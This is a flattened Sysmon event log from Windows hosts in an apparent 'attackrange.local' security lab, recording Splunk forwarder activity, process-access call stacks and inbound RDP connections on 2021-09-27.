AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000977694Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:23.739{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-25003-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000977693Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:23.315{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse212.102.34.245unn-212-102-34-245.datapacket.com49792-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000977692Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:27.143{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=71A3555579FFDBA9031A4DF0BA42180D,SHA256=F2572F21F2E844E7B0EF5FE99213D03498180CC88C375B9CE754532D5FCECBFA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049081Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:27.040{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=11BF5C2FF787B9F642223D5B3C72FD46,SHA256=E705458558296D1DF0EA11D88E7D89E8063FF889E35E40560FC9A6C812A129E6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049080Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:27.039{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=39D8515ED32D06A1DA8A6CB2E786EAD3,SHA256=1EA78AF05D5A2B32016E57524C6ED280A8EBCAAD24CFE27A391DF236C8989387,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049083Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:28.338{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F7311438505DD007471C0C090DE74BE5,SHA256=1139EA1EEFEF03739B7FC49F102D6BE1F9371BFBC0D993B5E42C8D2411BE5093,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977738Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:28.814{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6A36F073D4DA0C27D7D3747BEB5D3816,SHA256=0EAE25B93C6D54AF036B9A7D88C184665CED98B77DA21F7B60C678A649CB93B8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000977737Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:28.689{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8994-6151-A179-00000000FD01}4064C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977736Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:28.689{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977735Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:28.689{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977734Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:28.689{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977733Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:28.689{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977732Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:28.689{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977731Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:28.689{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977730Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:28.689{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977729Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:28.689{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977728Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:28.689{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977727Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:28.689{69CF5F33-7F27-614D-0500-00000000FD01}408524C:\Windows\system32\csrss.exe{69CF5F33-8994-6151-A179-00000000FD01}4064C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000977726Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:28.689{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8994-6151-A179-00000000FD01}4064C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000977725Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:28.674{69CF5F33-8994-6151-A179-00000000FD01}4064C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000977724Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:25.539{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-62079-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000977723Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:28.299{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=56B669D8F615634205ED229B114F857E,SHA256=2EC55E5230DFCF946FCB2890334FDFCADBD0C38B9FE8DA20C5B468BA575B7ADB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000977722Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:28.174{69CF5F33-8993-6151-A079-00000000FD01}23602276C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977721Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:28.002{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8993-6151-A079-00000000FD01}2360C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977720Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:28.002{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977719Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:28.002{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977718Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:28.002{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977717Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:28.002{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977716Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:28.002{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977715Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:28.002{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977714Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:28.002{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 